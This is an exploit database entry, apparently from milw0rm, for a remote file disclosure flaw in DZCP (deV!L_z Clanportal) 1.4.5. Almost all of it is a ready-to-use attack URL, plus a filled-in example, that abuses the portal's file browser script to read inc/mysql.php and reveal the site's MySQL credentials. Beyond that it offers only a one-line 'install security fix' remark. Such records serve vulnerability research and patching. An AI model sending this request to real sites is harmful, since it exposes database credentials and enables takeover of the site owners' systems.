DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure

2007-02-21T00:00:00
ID EXPLOITPACK:E8DAADD3CB766ECCD5CFBF8506440044
Type exploitpack
Reporter Kiba
Modified 2007-02-21T00:00:00

Description

DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure

                                        
                                            # DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]